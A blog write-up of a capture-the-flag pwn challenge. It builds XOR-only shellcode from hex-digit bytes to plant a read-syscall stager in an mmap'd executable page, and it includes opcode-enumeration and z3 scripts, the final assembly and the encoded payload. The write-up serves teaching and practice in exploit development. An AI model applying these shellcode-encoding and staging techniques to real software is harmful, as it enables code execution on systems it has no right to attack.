<!doctype html><html lang=en class=no-js data-theme=dark><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>16-Bit: XOR-only shellcoding · eddie xiao</title><meta name=description content="vulnerability research · ctf · embedded network stacks"><meta name=generator content="Hugo 0.165.0"><link rel=canonical href=https://ex4722.github.io/posts/2022/16-bit-xor-only-shellcoding/><link rel=alternate type=application/rss+xml href=https://ex4722.github.io/feed.xml title="eddie xiao"><link rel=preload href=https://ex4722.github.io/fonts/jbmono-variable.woff2 as=font type=font/woff2 crossorigin><link rel=stylesheet href=/css/main.55f9f4ccba10162775595233ceb1d4b6b96f2b719e755025522767a7ec21aef5.css integrity="sha256-Vfn0zLoQFid1WVIzzrHUtrlvK3GedVAlUidnp+whrvU="><script>(function(){var e=localStorage.getItem("theme");e||(e=window.matchMedia("(prefers-color-scheme: light)").matches?"light":"dark"),document.documentElement.setAttribute("data-theme",e),document.documentElement.classList.remove("no-js"),document.documentElement.classList.add("js")})()</script><link rel=pgp-key href=/pgp.txt></head><body><div class="buf page-post" style=--cat-color:#b58900><div class=progress-bar><div class=progress-bar-fill id=progress-fill style=background:#b58900></div></div><div class=buf-body><main id=main class=content><div class=post-meta><span class=cat>PWN</span>
&#183; 2022-06-10
&#183; 8 MIN &#183; X86-64 / MMAP'D RWX PAGE</div><h1 class=post-h1>16-Bit: XOR-only shellcoding</h1><div class=post-subtitle>mmap'd shellcode restricted to two hex-digit characters — so it has to XOR itself into existence.</div><div class=tldr style=--cat-color:#b58900><span class=tldr-label>TL;DR</span>
<span class=tldr-text>The decoded shellcode may only contain the bytes 0-9A-F, so build it out of chained xor instructions.</span></div><div class="prose post-body"><p><em>During the ICC competition we where given a shellcoding challenge to make a base64 encoded shellcode, ie the shellcode could only consist of the characters "a-zA-Z0-9+/=", during an 8 hour ctf we completed it in about 1.5 hours. How long will it take you to create base16 shellcode?</em></p><p>Provided: chal + libc.so.6</p><p>tl;dr: Xor the hell out of everything</p><p>Disclaimer: I did not solve this challenge during the CTF. After the CTF ended skimmed over these writeups and chatted with another solver. My approach was pretty similar to the second writeup.</p><p><a href=https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/CyberOpen22/16-bit>https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/CyberOpen22/16-bit</a></p><p><a href=https://ctftime.org/writeup/34583>https://ctftime.org/writeup/34583</a></p><h2 id=analysis>Analysis</h2><p>This binary was very straight forward and the prompt hinted that this would be shellcodeing with hex characters only.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>int32_t main(int32_t argc, char** argv, char** envp)
</span></span><span class=line><span class=cl>    setup()
</span></span><span class=line><span class=cl>    int64_t rax_1 = mmap(addr: 0x133713370000, len: 0x1000, prot: 7, flags: 0x32, fd: 0xffffffff, offset: 0)
</span></span><span class=line><span class=cl>    if (rax_1 == 0x133713370000)
</span></span><span class=line><span class=cl>        read(fd: 0, buf: rax_1, nbytes: 0x64)
</span></span><span class=line><span class=cl>        encode(rax_1)
</span></span><span class=line><span class=cl>        rax_1()
</span></span><span class=line><span class=cl>        return 0
</span></span><span class=line><span class=cl>    puts(str: &#34;mmap failed&#34;)
</span></span><span class=line><span class=cl>    exit(status: 0xffffffff)
</span></span><span class=line><span class=cl>    noreturn
</span></span></code></pre></div><p>Testing this by dumping random shellcode and it converts the bytes into the hex string variable of the input. One note was that the characters are upper case instead of lowercase</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=p>[</span><span class=n>ins</span><span class=p>]</span> <span class=n>In</span> <span class=p>[</span><span class=mi>3</span><span class=p>]:</span> <span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>b</span><span class=s1>&#39;ABCDEF1337&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=p>[</span><span class=n>ins</span><span class=p>]</span> <span class=n>In</span> <span class=p>[</span><span class=mi>4</span><span class=p>]:</span> <span class=n>lo</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>rax</span><span class=p>:</span> <span class=mh>0x133713370000</span> <span class=err>→</span>  <span class=s2>&#34;41424344454631333337000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000&#34;</span>
</span></span><span class=line><span class=cl><span class=n>rsi</span><span class=p>:</span> <span class=mh>0x133713370000</span> <span class=err>→</span>  <span class=s2>&#34;41424344454631333337000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000&#34;</span>
</span></span><span class=line><span class=cl><span class=n>rcx</span><span class=p>:</span> <span class=mh>0x55abcf458060</span> <span class=err>→</span>  <span class=s2>&#34;0123456789ABCDEF&#34;</span>
</span></span><span class=line><span class=cl><span class=n>rdx</span><span class=p>:</span> <span class=mh>0x1337133700c6</span>
</span></span><span class=line><span class=cl><span class=n>rbx</span><span class=p>:</span> <span class=mh>0x0</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=o>-&gt;</span>  <span class=mh>0x133713370000</span><span class=p>:</span> <span class=mi>34</span> <span class=mi>31</span>  <span class=n>xor</span>    <span class=n>al</span><span class=p>,</span> <span class=mh>0x31</span>
</span></span><span class=line><span class=cl>    <span class=mh>0x133713370002</span><span class=p>:</span> <span class=mi>34</span> <span class=mi>32</span>  <span class=n>xor</span>    <span class=n>al</span><span class=p>,</span> <span class=mh>0x32</span>
</span></span><span class=line><span class=cl>    <span class=mh>0x133713370004</span><span class=p>:</span> <span class=mi>34</span> <span class=mi>33</span>  <span class=n>xor</span>    <span class=n>al</span><span class=p>,</span> <span class=mh>0x33</span>
</span></span><span class=line><span class=cl>    <span class=mh>0x133713370006</span><span class=p>:</span> <span class=mi>34</span> <span class=mi>34</span>  <span class=n>xor</span>    <span class=n>al</span><span class=p>,</span> <span class=mh>0x34</span>
</span></span><span class=line><span class=cl>    <span class=mh>0x133713370008</span><span class=p>:</span> <span class=mi>34</span> <span class=mi>35</span>  <span class=n>xor</span>    <span class=n>al</span><span class=p>,</span> <span class=mh>0x35</span>
</span></span></code></pre></div><h2 id=valid-optcodes>Valid Optcodes</h2><p>Since we have a rather limited charset of "0123456789ABCDEF" I wanted to know all possible instructions using these opcodes. I noticed most of these were XOR instructions so wrote a script to get all possible permutations of these bytes. I then used the pwn.disasm module to disassemble them. One thing to note is that I padded it with a lot of nops so opcodes didn't collide with each other</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl><span class=kn>from</span> <span class=nn>itertools</span> <span class=kn>import</span> <span class=n>permutations</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>perm</span> <span class=o>=</span> <span class=p>[]</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=nb>range</span><span class=p>(</span><span class=mi>5</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>perm</span><span class=o>.</span><span class=n>append</span><span class=p>(</span><span class=nb>list</span><span class=p>(</span><span class=n>permutations</span><span class=p>(</span><span class=nb>list</span><span class=p>(</span><span class=s2>&#34;0123456789ABCDEF&#34;</span><span class=p>),</span><span class=n>i</span><span class=p>)))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>optcodes</span> <span class=o>=</span> <span class=sa>b</span><span class=s2>&#34;&#34;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>for</span> <span class=n>l</span> <span class=ow>in</span> <span class=n>perm</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=n>l</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>optcodes</span> <span class=o>+=</span> <span class=s2>&#34;&#34;</span><span class=o>.</span><span class=n>join</span><span class=p>(</span><span class=n>i</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>(</span><span class=s1>&#39;latin&#39;</span><span class=p>)</span> <span class=o>+</span> <span class=sa>b</span><span class=s1>&#39;</span><span class=se>\x90</span><span class=s1>&#39;</span><span class=o>*</span><span class=mi>10</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>arch</span> <span class=o>=</span> <span class=s1>&#39;amd64&#39;</span>
</span></span><span class=line><span class=cl><span class=nb>print</span><span class=p>(</span><span class=n>disasm</span><span class=p>(</span><span class=n>optcodes</span><span class=p>))</span>
</span></span></code></pre></div><p>After running this script we got a gigantic file, using more filtering using grep I had a pretty good list of good opcodes. One thing to note is that from the other writeups it was pretty obvious that XOR was the way to win so I filtered out all the cmp, xchg and rex instructions.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>python3 find_ops.py &gt; optcodes
</span></span><span class=line><span class=cl>grep -v <span class=m>90</span> optcodes  &gt; optcodes2
</span></span><span class=line><span class=cl>grep -v bad optcodes2 &gt; optcodes3
</span></span><span class=line><span class=cl>grep -v cmp optcodes3 &gt; optcodes4
</span></span><span class=line><span class=cl>grep -v rex optcodes4 &gt; optcodes5
</span></span><span class=line><span class=cl>sed <span class=s1>&#39;s/^.\{16\}//&#39;</span> optcodes5 &gt; optcodes6 
</span></span><span class=line><span class=cl>sort optcodes6 <span class=p>|</span> uniq &gt; optcodes7
</span></span><span class=line><span class=cl>grep -v <span class=se>\*</span> optcodes7 &gt; optcodes8
</span></span></code></pre></div><p>The overall idea of this challenge is to use XOR to set a register to a write value and another one to an address to write. Using this write primitive we can write a stager shellcode that allows us to read in more shellcode.</p><p>A major part of this challenge was reusing the registers that already existed, one thing to note is that on Ubuntu 22.04 the rbx value is NOT <code>__libc_csu_init</code>, instead its null. I know on remote this was true so I patched it using binja and gdb.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>$rax   : 0x00133713370000  →  &#34;41420A00000000000000000000000000000000000000000000[...]&#34;
</span></span><span class=line><span class=cl>$rbx   : 0x00556cf516b450  →  &lt;__libc_csu_init+0&gt; push r15
</span></span><span class=line><span class=cl>$rsi   : 0x00133713370000  →  &#34;41420A00000000000000000000000000000000000000000000[...]&#34;
</span></span><span class=line><span class=cl>$rcx   : 0x00556cf516e060  →  &#34;0123456789ABCDEF&#34;
</span></span><span class=line><span class=cl>$rdx   : 0x001337133700c6  →  0x00000000003030 (&#34;00&#34;?)
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>$rsp   : 0x007ffdc37f1b48  →  0x00556cf516b447  →  &lt;main+150&gt; mov eax, 0x0
</span></span><span class=line><span class=cl>$rbp   : 0x007ffdc37f1b60  →  0x0000000000000000
</span></span><span class=line><span class=cl>$rdi   : 0x007ffdc37f1ab0  →  0x000000000a4241 (&#34;AB\n&#34;?)
</span></span><span class=line><span class=cl>$rip   : 0x00133713370000  →  &#34;41420A00000000000000000000000000000000000000000000[...]&#34;
</span></span><span class=line><span class=cl>$r8    : 0xffffffff
</span></span><span class=line><span class=cl>$r9    : 0x0
</span></span><span class=line><span class=cl>$r10   : 0x00556cf516a5a9  →  0x65766f6d6d656d (&#34;memmove&#34;?)
</span></span><span class=line><span class=cl>$r11   : 0x007f4e51f7b6e0  →  &lt;__memmove_avx_unaligned_erms+0&gt; endbr64
</span></span><span class=line><span class=cl>$r12   : 0x00556cf516b0b0  →  &lt;_start+0&gt; xor ebp, ebp
</span></span><span class=line><span class=cl>$r13   : 0x007ffdc37f1c50  →  0x0000000000000001
</span></span><span class=line><span class=cl>$r14   : 0x0
</span></span><span class=line><span class=cl>$r15   : 0x0
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>rax/rsi-&gt;Shellcode
</span></span><span class=line><span class=cl>rbx-&gt;csu
</span></span><span class=line><span class=cl>rcx-&gt;BSS string
</span></span><span class=line><span class=cl>rdx-&gt;End
</span></span></code></pre></div><p>The "null" instructions is effectivley a NOP if rax points to valid memory
<code>xor byte ptr [rax], dh</code></p><p>Looking through the shellcode there is a lot of instructions in this shape, this could be used as a write.
<code>xor DWORD PTR [rcx+0x43], eax</code></p><p>On top of that, theirs are a lot of instructions to modify eax so I used that as the write value registers.</p><p>Instead of setting up a register with an address to write to I this one as rdx is the end of our shellcode so + 0x30 should be a good spot.
<code>xor DWORD PTR [rdx+0x30], eax</code></p><p>To modify the rax register there were direct XOR's but only in the allowed range. Using this range alone it's impossible to generate the syscall instruction so we need more.
<code>xor DWORD PTR [rbx+0x30], eax</code></p><p>Rbx points to csu_init and there are instructions to dereference it and xor with eax.
<code>xor eax, DWORD PTR [rbx+0x30]</code></p><p>This means that we can also use bytes that are inside of csu_init</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=p>[</span><span class=n>nav</span><span class=p>]</span> <span class=n>In</span> <span class=p>[</span><span class=mi>17</span><span class=p>]:</span> <span class=nb>print</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>execute_backend_command</span><span class=p>(</span><span class=s2>&#34;x/20bx $rbx+0x30&#34;</span><span class=p>))</span>
</span></span><span class=line><span class=cl><span class=mh>0x55abcf455480</span><span class=p>:</span> <span class=mh>0x03</span> <span class=mh>0x74</span> <span class=mh>0x1b</span> <span class=mh>0x31</span> <span class=mh>0xdb</span> <span class=mh>0x0f</span> <span class=mh>0x1f</span> <span class=mh>0x00</span>
</span></span><span class=line><span class=cl><span class=mh>0x55abcf455488</span><span class=p>:</span> <span class=mh>0x4c</span> <span class=mh>0x89</span> <span class=mh>0xf2</span> <span class=mh>0x4c</span> <span class=mh>0x89</span> <span class=mh>0xee</span> <span class=mh>0x44</span> <span class=mh>0x89</span>
</span></span><span class=line><span class=cl><span class=mh>0x55abcf455490</span><span class=p>:</span> <span class=mh>0xe7</span> <span class=mh>0x41</span> <span class=mh>0xff</span> <span class=mh>0x14</span>
</span></span></code></pre></div><p>Hence the write primitive would look something like this</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>xor al, 0x41
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+ 0x30 ]
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 0x30 ], al
</span></span></code></pre></div><p>Out stager shellcode can be very short as most of the registers for a read syscall are already in place.
Rsi is pointing to the shellcode buffer, rdx is pointing to the end so it a large amount for read count. We just need to null rdi, rax and call syscall for our final shellcode.</p><p>Since rsi is already pointing to the shellcode buffer can just not touch it for the read syscall. Rdx points to the end so it's already a big number for read count</p><p>I had to keep in mind that we only have access to a certain range so used this to cycle through csu_init and grab only the bytes we have access to</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=nb>range</span><span class=p>(</span><span class=mh>0x30</span><span class=p>,</span> <span class=mh>0x50</span> <span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>i</span> <span class=ow>in</span> <span class=n>opts</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>csu</span><span class=o>.</span><span class=n>append</span><span class=p>((</span><span class=n>u8</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>bv</span><span class=o>.</span><span class=n>read</span><span class=p>(</span> <span class=n>p</span><span class=o>.</span><span class=n>bv</span><span class=o>.</span><span class=n>symbols</span><span class=p>[</span><span class=s1>&#39;__libc_csu_init&#39;</span><span class=p>][</span><span class=mi>0</span><span class=p>]</span><span class=o>.</span><span class=n>address</span><span class=o>+</span><span class=n>i</span><span class=p>,</span> <span class=mi>1</span><span class=p>))))</span>
</span></span><span class=line><span class=cl>    <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>csu</span><span class=o>.</span><span class=n>append</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span></code></pre></div><p>This gave us a pretty nice range of opcodes, in the end, we had all of these</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=n>csu</span> <span class=o>=</span> <span class=p>[</span><span class=mh>0x3</span><span class=p>,</span> <span class=mh>0x74</span><span class=p>,</span> <span class=mh>0x1B</span><span class=p>,</span> <span class=mh>0x31</span><span class=p>,</span> <span class=mh>0xDB</span><span class=p>,</span> <span class=mh>0xF</span><span class=p>,</span> <span class=mh>0x1F</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x4C</span><span class=p>,</span> <span class=mh>0x89</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x41</span><span class=p>,</span> <span class=mh>0xFF</span><span class=p>,</span> <span class=mh>0x14</span><span class=p>,</span> <span class=mh>0xDF</span><span class=p>,</span> <span class=mh>0x48</span><span class=p>,</span> <span class=mh>0x83</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>,</span> <span class=mh>0x0</span><span class=p>]</span>
</span></span><span class=line><span class=cl><span class=n>opts</span><span class=o>=</span> <span class=sa>b</span><span class=s2>&#34;0123456789ABCDEF&#34;</span>
</span></span></code></pre></div><p>Manually finding a valid combination to get shellcode bytes worried me but z3 came to the rescue, surprisingly this worked for all the bytes.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>import</span> <span class=nn>z3</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>find_valid</span><span class=p>(</span><span class=n>target</span> <span class=p>:</span> <span class=nb>int</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>s</span> <span class=o>=</span> <span class=n>z3</span><span class=o>.</span><span class=n>Solver</span><span class=p>()</span>
</span></span><span class=line><span class=cl>    <span class=n>x</span> <span class=o>=</span> <span class=n>z3</span><span class=o>.</span><span class=n>BitVec</span><span class=p>(</span><span class=s1>&#39;x&#39;</span><span class=p>,</span> <span class=mi>32</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>y</span> <span class=o>=</span> <span class=n>z3</span><span class=o>.</span><span class=n>BitVec</span><span class=p>(</span><span class=s1>&#39;y&#39;</span><span class=p>,</span> <span class=mi>32</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=n>s</span><span class=o>.</span><span class=n>add</span><span class=p>(</span> <span class=n>z3</span><span class=o>.</span><span class=n>Or</span><span class=p>([</span> <span class=n>x</span> <span class=o>==</span><span class=n>i</span> <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=n>csu</span> <span class=o>+</span> <span class=p>[</span> <span class=n>a</span> <span class=k>for</span> <span class=n>a</span> <span class=ow>in</span> <span class=n>opts</span><span class=p>]</span> <span class=p>]))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=n>s</span><span class=o>.</span><span class=n>add</span><span class=p>(</span> <span class=n>z3</span><span class=o>.</span><span class=n>Or</span><span class=p>([</span> <span class=n>y</span> <span class=o>==</span><span class=n>i</span> <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=n>csu</span> <span class=o>+</span> <span class=p>[</span> <span class=n>a</span> <span class=k>for</span> <span class=n>a</span> <span class=ow>in</span> <span class=n>opts</span><span class=p>]</span> <span class=p>]))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=n>s</span><span class=o>.</span><span class=n>add</span><span class=p>(</span><span class=n>x</span> <span class=o>^</span> <span class=n>y</span><span class=o>==</span> <span class=n>target</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nb>print</span><span class=p>(</span><span class=n>s</span><span class=o>.</span><span class=n>check</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=nb>print</span><span class=p>(</span><span class=n>s</span><span class=o>.</span><span class=n>model</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=p>(</span><span class=n>s</span><span class=o>.</span><span class=n>model</span><span class=p>()[</span><span class=n>x</span><span class=p>]</span><span class=o>.</span><span class=n>as_long</span><span class=p>(),</span> <span class=n>s</span><span class=o>.</span><span class=n>model</span><span class=p>()[</span><span class=n>y</span><span class=p>]</span><span class=o>.</span><span class=n>as_long</span><span class=p>())</span>
</span></span></code></pre></div><p>With these two in hand, we could construct a shellcode that would xor the output from find_valid and then move it after the end of the shellcode. Hence after this setup, it would have a fake nop sled until it hit our shellcode.</p><h3>Things to Note:</h3><ul><li><p>The original csu xor optode didn't work as XORing eax would result in the upper bits of rax also getting nulled out. Without the upper bits of rax the nop sled would be invalid. Luckily the single byte version was also valid shellcode</p><p><code>xor eax, DWORD PTR [rbx+0x30]</code></p><p><code>xor al, BYTE PTR [rbx+0x30]</code></p></li><li><p>The read will read into the beginning of our shellcode, so we need to have a nop sled so we overwrite the current RIP.</p></li><li><p>After each write rax needs to be accounted for or cleared out, z3 either needs to know the old rax value or we could just rexor as x ^ y ^x ^y is still 0.</p></li><li><p>Using 0 as padding in csu was a bad idea but hard coding in the csu index of null fixes this.</p></li></ul><p>Final Shellcode</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>xor al, 49
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+55 ]
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 48 ], al
</span></span><span class=line><span class=cl>xor al, 49
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+55 ]
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+50 ]
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+52 ]
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 49 ], al
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+50 ]
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+52 ]
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+49 ]
</span></span><span class=line><span class=cl>xor al, 69
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 50 ], al
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+49 ]
</span></span><span class=line><span class=cl>xor al, 69
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+66 ]
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+55 ]
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 51 ], al
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+66 ]
</span></span><span class=line><span class=cl>xor al, BYTE PTR [rbx+55 ]
</span></span><span class=line><span class=cl>xor al, 57
</span></span><span class=line><span class=cl>xor al, 54
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 52 ], al
</span></span><span class=line><span class=cl>xor al, 57
</span></span><span class=line><span class=cl>xor al, 54
</span></span><span class=line><span class=cl>xor al, 70
</span></span><span class=line><span class=cl>xor al, 67
</span></span><span class=line><span class=cl>xor BYTE PTR [rdx+ 53 ], al
</span></span><span class=line><span class=cl>xor al, 70
</span></span><span class=line><span class=cl>xor al, 67
</span></span></code></pre></div><p>Final Shellcode encoded</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=sa>b</span><span class=s2>&#34;412C70B0412C72C22C40B12C22C42C14E0B22C14E2CB2C70B32CB2C749460B449464F4C0B54F4C&#34;</span>
</span></span></code></pre></div><p>NOTE:
The original exploit use pinja a homebrew combination of pwn tools and binary ninja's debugger. If you happen to own Binary Ninja commerial and would like to try it out <a href=https://github.com/ex4722/pinja>https://github.com/ex4722/pinja</a>.Pwn2.py uses the regular version of pwn tools.</p></div></main></div><div class=statusline style=--mode:#b58900><a class=mode href=/>NORMAL</a>
<a class=file href=/posts/>posts/2022/16-bit-xor-shellcode.md</a>
<span class="cell cell--auto" id=status-ln>ln 1/187</span><span class="cell cell--chrome" id=status-pct>0%</span></div></div><div class=palette-backdrop data-palette-backdrop></div><div class=palette id=cmd-palette role=dialog aria-modal=true aria-label="Command palette"><div class=palette-handle-row><span class=palette-handle></span></div><div class=palette-input-row><span class=colon aria-hidden=true>:</span>
<input class=palette-input id=palette-input type=text autocomplete=off autocapitalize=off spellcheck=false aria-label=Command></div><div class=palette-results role=listbox aria-label=Commands id=palette-results><a class=palette-row role=option data-cmd=:posts data-desc="all write-ups" href=/posts/ style=color:#b58900><span class=cmd style=width:76px;flex:none>:posts</span><span class=desc>all write-ups</span>
</a><a class=palette-row role=option data-cmd=:cheat data-desc="cheatsheet index" href=/cheatsheets/ style=color:#2aa198><span class=cmd style=width:76px;flex:none>:cheat</span><span class=desc>cheatsheet index</span>
</a><a class=palette-row role=option data-cmd=:about data-desc="who's typing" href=/about/ style=color:#d33682><span class=cmd style=width:76px;flex:none>:about</span><span class=desc>who's typing</span>
</a><a class=palette-row role=option data-cmd=:theme data-desc="light / dark" href=# data-action=theme style=color:#6c71c4><span class=cmd style=width:76px;flex:none>:theme</span><span class=desc>light / dark</span>
</a><a class=palette-row role=option data-cmd=:rss data-desc=subscribe href=/feed.xml style=color:#268bd2><span class=cmd style=width:76px;flex:none>:rss</span><span class=desc>subscribe</span></a></div></div><nav class=palette-fallback aria-label=Site><ul><li><a href=/posts/>:posts</a> — all write-ups</li><li><a href=/cheatsheets/>:cheat</a> — cheatsheet index</li><li><a href=/about/>:about</a> — who's typing</li><li><a href=#>:theme</a> — light / dark</li><li><a href=/feed.xml>:rss</a> — subscribe</li></ul></nav><div class=lightbox id=lightbox aria-hidden=true><div class=lightbox-body><img id=lightbox-img src alt><div class=lightbox-cap id=lightbox-cap></div></div><div class=statusline><span class=mode style=--mode:var(--mode-zoom)>ZOOM</span>
<span class=file>h/l next &#183; q close</span>
<span class="cell cell--auto cell--chrome" id=lightbox-count>1/1</span></div></div><script src=/js/bundle.e64d1a1fd7dd93ee47fdcbd5c0b75bb8422ad5f9ec5ad0ee69b531c9887d1a9f.js integrity="sha256-5k0aH9fdk+5H/cvVwLdbuEIq1fnsWtDuabUxyYh9Gp8=" defer></script></body></html>